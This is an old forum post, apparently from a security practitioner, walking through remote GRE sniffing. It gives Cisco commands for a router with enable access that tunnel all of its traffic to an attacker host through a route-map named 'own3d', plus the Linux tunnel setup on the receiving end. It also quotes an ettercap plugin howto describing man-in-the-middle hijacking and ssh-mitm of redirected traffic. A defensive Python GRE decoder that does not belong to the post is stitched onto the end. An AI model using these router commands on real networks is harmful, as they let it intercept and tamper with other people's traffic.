Posted 18 January 2004 - 11:18 AM
I've experimented with GRE sniffing a bit, without having the luxury of having a router at home. This is possible using Linux. A quick copy / paste from my site:
Ok, This is the story:
I was fascinated by the thought of remote GRE sniffing, and was planning to buy a 2nd hand router in order to attempt this. I later found out that GRE tunnels are supported by the Linux kernel.
I recompiled the kernel with :
+GRE tunnel Support
+Advanced routing
+Policy Routing
I then go to "my" remote router and create a GRE tunnel:
Code:
User Access Verification
Password:
Cisco2501>en
Password:
Cisco2501#conf t
Enter configuration commands, one per line. End with CNTL/Z.
Cisco2501(config)#int tunnel 0
Cisco2501(config-if)#ip address 1.1.1.1 255.255.255.0
Cisco2501(config-if)#tunnel source eth0
Cisco2501(config-if)#tunnel dest <attacker IP>
Cisco2501(config-if)#tunnel mode gre ip
Cisco2501(config-if)#exit
Cisco2501(config)#
I then create a tunnel on the attacker machine (Linux):
Code:
#iptunnel add mynet mode gre remote <Attacked Router IP> local <Attacking IP> ttl 255
#ip addr add 1.1.1.2/24 dev mynet
#route add -net 1.1.1.0 netmask 255.255.255.0 dev mynet
#ifconfig mynet up
I find that I can then ping the other side of the tunnel (the router):
Code:
bash-2.05b# ping 1.1.1.1
PING 1.1.1.1 (1.1.1.1) 56(84) bytes of data.
64 bytes from 1.1.1.1: icmp_seq=1 ttl=255 time=242 ms
64 bytes from 1.1.1.1: icmp_seq=2 ttl=255 time=234 ms
64 bytes from 1.1.1.1: icmp_seq=3 ttl=255 time=243 ms
64 bytes from 1.1.1.1: icmp_seq=4 ttl=255 time=239 ms
--- 1.1.1.1 ping statistics ---
4 packets transmitted, 4 received, 0% packet loss, time 2997ms
rtt min/avg/max/mdev = 0.234/0.239/0.243/0.015 ms
bash-2.05b#
I then tried to do some policy routing on the router (to direct all traffic to my attacking machine via the tunnel):
Code:
Cisco2501#conf t
Enter configuration commands, one per line. End with CNTL/Z.
Cisco2501(config)#access-list 120 permit ip any any
Cisco2501(config)#route-map own3d
Cisco2501(config-route-map)#match ip address 120
Cisco2501(config-route-map)#set ip next-hop 1.1.1.2
Cisco2501(config-route-map)#exit
Cisco2501(config)#int eth0
Cisco2501(config-if)#ip policy route-map own3d
Cisco2501(config-if)#exit
I then attempt to configure route mapping on linux:
Code:
#ip ru add from 1.1.1.1 lookup 4
#ip ro add 0.0.0.0/0 via 1.1.1.2 table 4
I then try to sniff GRE traffic, and nothing appears.
I've even tried ettercap, which can supposedly sniff remote GRE traffic:
This is from the ettercap GRE plugin howto:
********************************************************************************************
-- ZARATAN PLUGIN HOWTO --
This plugin is useful to sniff, as local, GRE-redirected remote traffic.
You can use it in normal sniffing mode or even in ARPsniffing to make mitm
attacks on remote traffic (like filtering/hijacking/injection or ssh-mitm)
The basic idea is to create a GRE tunnel that sends all the traffic on router
interface to your machine...then zaratan will decapsulate it and re-route it
for you.
First of all you have to have an "enable" access on a remote cisco router then..
..
--If you want to use it in ARP mode:
Edit the etter.conf file.
Insert in the OPTIONS field "-H <gateway_ip>".
Comment all the other unuseful fields.
Set the GWIP field with your gateway's ip again.
Now launch ettercap -e etter.conf.
Select the gateway as SOURCE and press 'a' button.
Activate zaratan plugin and deactivate all other plugins (it's more secure).
Ping your gateway and you will see the plugin output
"Redirect tunnel to x.x.x.x".
Remember this IP (later known as FakeIP).
--If you want to use it in normal sniffing mode:
Simply launch ettercap then press 's' button and activate zaratan plugin.
Ping your gateway and you will see again plugin output
"Redirect tunnel to x.x.x.x"
Once again this is our FakeIP.
Now on the remote cisco router....
Set up the tunnel0 interface with mode GRE ip encapsulation.
Set up, as source, router's serial interface and, as dest, our FakeIP.
Setup an access list that permits hosts and ports you want to sniff
(tcp any any for example) but not the traffic with type of service equal to 7,
cause all the traffic redirected/generated from zaratan has this tos,
and we don't want to redirect it again in the tunnel
(pay attention to traffic direction!).
Set up a route-map that has previous access list and, as next-hop, an ip
address on the same subnet of the tunnel0's ip address.
Set up the route-map on both serial and ethernet interface of the router.
Have fun.
--------------------------------------------------------------------------
We have intentionally omitted a step-by-step router configuration to avoid
kiddies-use of this tool. You have at least to know basic cisco router
configuration and to understand basically how this plugin works to play
this trick.
--------------------------------------------------------------------------
Remember that you have to bind, on your machine, a public address or a
static natted one, cause the router has to reach our FakeIP.
You can use it even on a PPP connection if you have two machines,
something like ipchains and a hub (btw you can think about it by yourself)
*********************************************************************************************
Hope you find this useful,
Muts
www.secureit.co.il
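A defender-side decoder for the GRE-in-IP encapsulation the post relies on, added here as an example (it is not code from the post, from ettercap, or from the Cisco/Linux tooling): it parses a raw IPv4 packet, checks for protocol 47, walks the GRE header flags, recovers the inner IP addresses, and raises an alert when the outer tunnel endpoints are not a known peer pair, which is exactly what a router suddenly encapsulating LAN traffic toward an unfamiliar host looks like on the wire. The packet bytes, the TEST-NET addresses and the trusted-peer set are constructed assumptions.

```python
import struct
import ipaddress

GRE_PROTO = 47          # IP protocol number for GRE
ETHERTYPE_IPV4 = 0x0800 # GRE protocol type for an encapsulated IPv4 packet

def parse_ipv4(buf):
    """Return (proto, src, dst, payload) from a raw IPv4 packet."""
    if len(buf) < 20:
        raise ValueError("short IPv4 header")
    ver_ihl, _tos, _tl, _id, _fo, _ttl, proto, _ck, src, dst = struct.unpack("!BBHHHBBH4s4s", buf[:20])
    ihl = (ver_ihl & 0x0F) * 4
    if ver_ihl >> 4 != 4 or ihl < 20 or len(buf) < ihl:
        raise ValueError("malformed IPv4 header")
    return proto, str(ipaddress.IPv4Address(src)), str(ipaddress.IPv4Address(dst)), buf[ihl:]

def parse_gre(buf):
    """Return (protocol_type, payload) from a GRE header (RFC 2784/2890).
    The C (checksum), K (key) and S (sequence) bits each add a 4-byte field."""
    if len(buf) < 4:
        raise ValueError("short GRE header")
    flags, ptype = struct.unpack("!HH", buf[:4])
    off = 4 + 4 * bool(flags & 0x8000) + 4 * bool(flags & 0x2000) + 4 * bool(flags & 0x1000)
    return ptype, buf[off:]

def build_ipv4(proto, src, dst, payload, tos=0):
    """Build a minimal IPv4 packet (checksum left zero; constructed test data only)."""
    hdr = struct.pack("!BBHHHBBH4s4s", 0x45, tos, 20 + len(payload), 0, 0, 64, proto, 0,
                      ipaddress.IPv4Address(src).packed, ipaddress.IPv4Address(dst).packed)
    return hdr + payload

def inspect_gre(outer, trusted_pairs):
    """Decapsulate one GRE-in-IPv4 packet: None if not GRE, else a finding dict."""
    proto, src, dst, payload = parse_ipv4(outer)
    if proto != GRE_PROTO:
        return None
    ptype, inner = parse_gre(payload)
    finding = {"outer_src": src, "outer_dst": dst, "ptype": ptype,
               "alert": (src, dst) not in trusted_pairs}
    if ptype == ETHERTYPE_IPV4:
        _, isrc, idst, _ = parse_ipv4(inner)
        finding.update(inner_src=isrc, inner_dst=idst)
    return finding

# Constructed sample: a router (192.0.2.1, TEST-NET) encapsulating an internal TCP
# packet toward an external host (198.51.100.7) that is not a sanctioned tunnel peer.
INNER = build_ipv4(6, "10.0.0.5", "10.0.0.9", b"\x00\x50\x1f\x90" + b"\x00" * 16)
GRE = struct.pack("!HH", 0x0000, ETHERTYPE_IPV4) + INNER   # no C/K/S flags set
SAMPLE = build_ipv4(GRE_PROTO, "192.0.2.1", "198.51.100.7", GRE)
TRUSTED = {("192.0.2.1", "192.0.2.2")}   # assumed: the only sanctioned GRE peer pair
```

Run over a capture by feeding each IP packet to `inspect_gre` and reporting findings with `alert` set; restricting protocol 47 at the perimeter to the known peer pairs is the matching preventive control.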